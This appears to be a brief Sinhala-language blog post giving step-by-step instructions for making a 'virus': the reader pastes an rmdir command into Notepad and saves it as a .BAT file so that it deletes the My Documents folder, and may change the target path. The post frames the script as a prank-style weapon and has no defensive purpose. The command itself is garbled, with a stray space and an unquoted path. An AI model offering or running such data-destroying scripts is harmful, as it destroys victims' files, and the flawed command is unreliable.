මේක ගොඩක් සරල virus එකක් වැඩිය බරපතල නෑ මේකෙන් වෙන්නේ my document delete වෙලා යන එක
01- Notepad open කරගන්න.
02- දැන් මේ code එක copy - paste කරගන්න.
rmdir C:\Documents and Settings \S\Q
03- දැන් BAT File extension ආකාරයට save කරගන්න.ඒ කිව්වේ virus.BAT වගේ...
04- ඔන්න වැඩේ හරි...
ඔයාලට ඕනෙමනම් මේකේ delete වෙන්න ඕන තැන වෙනස් කරන්නත් පුළුවන්
හොදද ?????????????
0 අදහස්:
Post a Comment